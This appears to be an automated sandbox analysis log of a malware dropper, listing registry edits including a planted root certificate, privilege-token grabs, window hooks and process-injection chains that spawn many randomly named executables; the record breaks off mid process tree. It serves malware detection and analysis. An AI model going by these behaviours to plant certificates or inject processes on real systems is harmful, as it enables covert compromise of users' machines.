Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	Graphics.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Q220XCw5sxrXeHH2DwwbnIaK.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Q220XCw5sxrXeHH2DwwbnIaK.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Q220XCw5sxrXeHH2DwwbnIaK.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
1256	pub2.exe
1256	pub2.exe
912	jfiag3g_gg.exe
912	jfiag3g_gg.exe
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036
3036

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3036
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1256 pub2.exe

pid	process
3036

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exetaskkill.exemd9_1sjm.exe

description	pid	process
Token: SeDebugPrivilege	1276	SoCleanInst.exe
Token: SeCreateTokenPrivilege	5100	Install.exe
Token: SeAssignPrimaryTokenPrivilege	5100	Install.exe
Token: SeLockMemoryPrivilege	5100	Install.exe
Token: SeIncreaseQuotaPrivilege	5100	Install.exe
Token: SeMachineAccountPrivilege	5100	Install.exe
Token: SeTcbPrivilege	5100	Install.exe
Token: SeSecurityPrivilege	5100	Install.exe
Token: SeTakeOwnershipPrivilege	5100	Install.exe
Token: SeLoadDriverPrivilege	5100	Install.exe
Token: SeSystemProfilePrivilege	5100	Install.exe
Token: SeSystemtimePrivilege	5100	Install.exe
Token: SeProfSingleProcessPrivilege	5100	Install.exe
Token: SeIncBasePriorityPrivilege	5100	Install.exe
Token: SeCreatePagefilePrivilege	5100	Install.exe
Token: SeCreatePermanentPrivilege	5100	Install.exe
Token: SeBackupPrivilege	5100	Install.exe
Token: SeRestorePrivilege	5100	Install.exe
Token: SeShutdownPrivilege	5100	Install.exe
Token: SeDebugPrivilege	5100	Install.exe
Token: SeAuditPrivilege	5100	Install.exe
Token: SeSystemEnvironmentPrivilege	5100	Install.exe
Token: SeChangeNotifyPrivilege	5100	Install.exe
Token: SeRemoteShutdownPrivilege	5100	Install.exe
Token: SeUndockPrivilege	5100	Install.exe
Token: SeSyncAgentPrivilege	5100	Install.exe
Token: SeEnableDelegationPrivilege	5100	Install.exe
Token: SeManageVolumePrivilege	5100	Install.exe
Token: SeImpersonatePrivilege	5100	Install.exe
Token: SeCreateGlobalPrivilege	5100	Install.exe
Token: 31	5100	Install.exe
Token: 32	5100	Install.exe
Token: 33	5100	Install.exe
Token: 34	5100	Install.exe
Token: 35	5100	Install.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeManageVolumePrivilege	2676	md9_1sjm.exe
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036
Token: SeCreatePagefilePrivilege	3036
Token: SeShutdownPrivilege	3036

Suspicious use of SetWindowsHookEx 31 IoCs

Processes:

yilMEqc2OnCuWXggZ5Wvqspr.exeAowVglzgHgeYTJHJgd0EbCha.exe4ImnAAlTfIviXcF8sF3kuGjm.exepAI3i8q2x5MNuhj3LsMeADO2.exeSea44K_kRZ3We5R5eaMK9iKZ.exeAgZwXYH5B2w8JzpCM8z4awg0.exeLQ8EGMztPvcf7Cm9AwCL3jwO.exeeP_kSFEt4D7h8o3_SYTwq4Nt.exejWEXdkAjoR3u59hYM3ZIoe4y.exeBew94hn6SQH_kEJ2Qr1S4hVc.exeMpFAZGCy3faZVe9SqA6gAAbh.exeL5GWogrRjr3mIsto0YlJMZtJ.exe2TUXRt3nRuL7ml_FpKXdseKN.exem9dvpW0hMK6oukeDQbAR3VQc.exezjcg2G7_6flQxpQGdnayMtzP.exeGeOTKmxtuLZW2GHDrc8f4Psk.exepAI3i8q2x5MNuhj3LsMeADO2.exeInstall.exeQ220XCw5sxrXeHH2DwwbnIaK.exeAppLaunch.exeAppLaunch.exeAppLaunch.exeAppLaunch.exeAppLaunch.exeInstall.exeEtaKN4_0pP7Q67ZzHQr5Hnyc.exechqhRMiSjEE0Y0ddM5wdKtnQ.exequEATuAAYyWo343c1CUsjvKL.exeizacevkd.execmd.exeKaAa7aogiVFFjGBRnq8SpRfN.exe

pid	process
4396	yilMEqc2OnCuWXggZ5Wvqspr.exe
4924	AowVglzgHgeYTJHJgd0EbCha.exe
4108	4ImnAAlTfIviXcF8sF3kuGjm.exe
3672	pAI3i8q2x5MNuhj3LsMeADO2.exe
1540	Sea44K_kRZ3We5R5eaMK9iKZ.exe
4468	AgZwXYH5B2w8JzpCM8z4awg0.exe
2712	LQ8EGMztPvcf7Cm9AwCL3jwO.exe
4284	eP_kSFEt4D7h8o3_SYTwq4Nt.exe
3780	jWEXdkAjoR3u59hYM3ZIoe4y.exe
4668	Bew94hn6SQH_kEJ2Qr1S4hVc.exe
3884	MpFAZGCy3faZVe9SqA6gAAbh.exe
364	L5GWogrRjr3mIsto0YlJMZtJ.exe
4696	2TUXRt3nRuL7ml_FpKXdseKN.exe
2064	m9dvpW0hMK6oukeDQbAR3VQc.exe
4064	zjcg2G7_6flQxpQGdnayMtzP.exe
2800	GeOTKmxtuLZW2GHDrc8f4Psk.exe
1664	pAI3i8q2x5MNuhj3LsMeADO2.exe
3044	Install.exe
4136	Q220XCw5sxrXeHH2DwwbnIaK.exe
2404	AppLaunch.exe
876	AppLaunch.exe
3584	AppLaunch.exe
4000	AppLaunch.exe
4708	AppLaunch.exe
1632	Install.exe
708	EtaKN4_0pP7Q67ZzHQr5Hnyc.exe
2156	chqhRMiSjEE0Y0ddM5wdKtnQ.exe
4348	quEATuAAYyWo343c1CUsjvKL.exe
2352	izacevkd.exe
1844	cmd.exe
4656	KaAa7aogiVFFjGBRnq8SpRfN.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exeFiles.exeInstall.execmd.exesvchost.exeGraphics.execmd.execsrss.exeFile.exe

description	pid	process	target process
PID 4588 wrote to memory of 1276	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	SoCleanInst.exe
PID 4588 wrote to memory of 1276	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	SoCleanInst.exe
PID 4588 wrote to memory of 2676	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	md9_1sjm.exe
PID 4588 wrote to memory of 2676	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	md9_1sjm.exe
PID 4588 wrote to memory of 2676	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	md9_1sjm.exe
PID 4588 wrote to memory of 4164	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Folder.exe
PID 4588 wrote to memory of 4164	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Folder.exe
PID 4588 wrote to memory of 4164	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Folder.exe
PID 4588 wrote to memory of 4236	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Graphics.exe
PID 4588 wrote to memory of 4236	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Graphics.exe
PID 4588 wrote to memory of 4236	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Graphics.exe
PID 4588 wrote to memory of 2472	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Updbdate.exe
PID 4588 wrote to memory of 2472	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Updbdate.exe
PID 4588 wrote to memory of 2472	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Updbdate.exe
PID 4588 wrote to memory of 5100	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 4588 wrote to memory of 5100	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 4588 wrote to memory of 5100	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Install.exe
PID 4588 wrote to memory of 1424	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Files.exe
PID 4588 wrote to memory of 1424	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Files.exe
PID 4588 wrote to memory of 1424	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	Files.exe
PID 4588 wrote to memory of 1256	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	pub2.exe
PID 4588 wrote to memory of 1256	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	pub2.exe
PID 4588 wrote to memory of 1256	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	pub2.exe
PID 4588 wrote to memory of 4320	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	File.exe
PID 4588 wrote to memory of 4320	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	File.exe
PID 4588 wrote to memory of 4320	4588	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe	File.exe
PID 1424 wrote to memory of 1072	1424	Files.exe	jfiag3g_gg.exe
PID 1424 wrote to memory of 1072	1424	Files.exe	jfiag3g_gg.exe
PID 1424 wrote to memory of 1072	1424	Files.exe	jfiag3g_gg.exe
PID 5100 wrote to memory of 4652	5100	Install.exe	cmd.exe
PID 5100 wrote to memory of 4652	5100	Install.exe	cmd.exe
PID 5100 wrote to memory of 4652	5100	Install.exe	cmd.exe
PID 4652 wrote to memory of 4972	4652	cmd.exe	taskkill.exe
PID 4652 wrote to memory of 4972	4652	cmd.exe	taskkill.exe
PID 4652 wrote to memory of 4972	4652	cmd.exe	taskkill.exe
PID 1424 wrote to memory of 912	1424	Files.exe	jfiag3g_gg.exe
PID 1424 wrote to memory of 912	1424	Files.exe	jfiag3g_gg.exe
PID 1424 wrote to memory of 912	1424	Files.exe	jfiag3g_gg.exe
PID 4240 wrote to memory of 3948	4240	svchost.exe	Graphics.exe
PID 4240 wrote to memory of 3948	4240	svchost.exe	Graphics.exe
PID 4240 wrote to memory of 3948	4240	svchost.exe	Graphics.exe
PID 3948 wrote to memory of 1564	3948	Graphics.exe	cmd.exe
PID 3948 wrote to memory of 1564	3948	Graphics.exe	cmd.exe
PID 1564 wrote to memory of 8	1564	cmd.exe	netsh.exe
PID 1564 wrote to memory of 8	1564	cmd.exe	netsh.exe
PID 3948 wrote to memory of 2432	3948	Graphics.exe	csrss.exe
PID 3948 wrote to memory of 2432	3948	Graphics.exe	csrss.exe
PID 3948 wrote to memory of 2432	3948	Graphics.exe	csrss.exe
PID 4240 wrote to memory of 5012	4240	svchost.exe	schtasks.exe
PID 4240 wrote to memory of 5012	4240	svchost.exe	schtasks.exe
PID 2432 wrote to memory of 2368	2432	csrss.exe	injector.exe
PID 2432 wrote to memory of 2368	2432	csrss.exe	injector.exe
PID 4320 wrote to memory of 400	4320	File.exe	ZzKf08aJT65s8mbuXkOfj5s2.exe
PID 4320 wrote to memory of 400	4320	File.exe	ZzKf08aJT65s8mbuXkOfj5s2.exe
PID 4320 wrote to memory of 4924	4320	File.exe	AowVglzgHgeYTJHJgd0EbCha.exe
PID 4320 wrote to memory of 4924	4320	File.exe	AowVglzgHgeYTJHJgd0EbCha.exe
PID 4320 wrote to memory of 4924	4320	File.exe	AowVglzgHgeYTJHJgd0EbCha.exe
PID 4320 wrote to memory of 4396	4320	File.exe	yilMEqc2OnCuWXggZ5Wvqspr.exe
PID 4320 wrote to memory of 4396	4320	File.exe	yilMEqc2OnCuWXggZ5Wvqspr.exe
PID 4320 wrote to memory of 4396	4320	File.exe	yilMEqc2OnCuWXggZ5Wvqspr.exe
PID 4320 wrote to memory of 4108	4320	File.exe	4ImnAAlTfIviXcF8sF3kuGjm.exe
PID 4320 wrote to memory of 4108	4320	File.exe	4ImnAAlTfIviXcF8sF3kuGjm.exe
PID 4320 wrote to memory of 4108	4320	File.exe	4ImnAAlTfIviXcF8sF3kuGjm.exe
PID 4320 wrote to memory of 4532	4320	File.exe	2DJKIPWfJHodIWIFhg_UsFQg.exe

C:\Users\Admin\AppData\Local\Temp\dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
"C:\Users\Admin\AppData\Local\Temp\dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4588

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
